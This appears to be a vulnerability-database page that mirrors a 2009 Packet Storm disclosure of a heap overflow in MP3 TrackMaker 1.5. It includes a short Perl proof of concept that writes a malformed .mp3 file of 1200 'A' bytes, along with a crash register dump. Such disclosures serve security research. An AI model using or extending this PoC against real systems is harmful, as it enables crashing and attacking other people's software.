Lucene search

K

MP3 TrackMaker 1.5 Heap Overflow

๐Ÿ—“๏ธย 09 Jan 2009ย 00:00:00Reported byย H-T TeamTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 13ย Views

MP3 TrackMaker 1.5 Heap Overflow Po

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`# #!/bin/perl  
  
# Author : HouSSamix  
  
# MP3 TrackMaker v1.5 .mp3 File Heap Overflow PoC  
# http://www.heathcosoft.com/software/mp3trackmaker/mp3tm15.exe  
  
# open the program > browse (source file) > file exploit  
  
#EAX 41414141 <<<   
#ECX 000000F8  
#EDX 0000020A  
#EBX 00000000  
#ESP 0012F408  
#EBP 0012F470  
#ESI 00000000  
#EDI 00000158  
#EIP 7C91EB94 ntdll.KiFastSystemCallRet  
  
print "===================================================================== \n";  
print "Author : Houssamix \n";  
print "===================================================================== \n";  
print "MP3 TrackMaker v1.5 .mp3 File Heap Overflow PoC \n";  
print "===================================================================== \n\n";  
  
my $file="hsmx.mp3";  
open(my $FILE, ">>$file") or die "Cannot open $file: $!";  
print $FILE "A" x 1200;  
close($FILE);  
print "$file has been created \n";  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
09 Jan 2009 00:00Current
1.3Low risk
Vulners AI Score1.3
13
.json
Report